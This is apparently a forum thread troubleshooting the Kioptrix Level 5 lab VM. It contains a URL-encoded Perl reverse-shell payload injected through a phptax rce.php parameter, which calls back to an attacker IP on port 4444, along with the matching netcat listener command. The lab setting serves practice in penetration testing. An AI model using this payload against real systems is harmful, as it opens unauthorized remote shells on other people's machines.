Getting an error when doing kioptrix level 5

When I run the pearl command
(http://(Kioptrix 5):8080/phptax/data/rce.php?cmd=perl%20-MIO%20-e%20%27$c=new%20IO::Socket::INET(PeerAddr,%22192.168.56.101:4444%22);STDIN-%3Efdopen($c,r);$~-%3Efdopen($c,w);system$_%20while%3C%3E;%27
) to get a reverse shell with netcat.

Netcat doesn’t seem to respond to the connection. What can I do?
Thanks in advance.

helmi,

Are you replacing (Kioptrix 5) with the correct IP for your Kioptrix 5 VM?

Yes I used the correct IP address of the VM.

Okay had to make sure lol.

Other things to check, correct IP for Kali Linux in the perl command 192.168.56.101? It’s the same as what I had in the example so make sure it’s the same as your Kali Linux IP for eth1 interface. Correct port for netcat 4444?

nc -nlvp 4444

http://(Kioptrix 5):8080/phptax/data/rce.php?cmd=perl%20-MIO%20-e%20%27$c=new%20IO::Socket::INET(PeerAddr,%22(KALI LINUX IP HERE):4444%22);STDIN-%3Efdopen($c,r);$~-%3Efdopen($c,w);system$_%20while%3C%3E;%27

Show me a screenshot of your command in burp suite.

Thanks it worked. The problem was when I entered the command into burp it didn’t have the kali linux ip.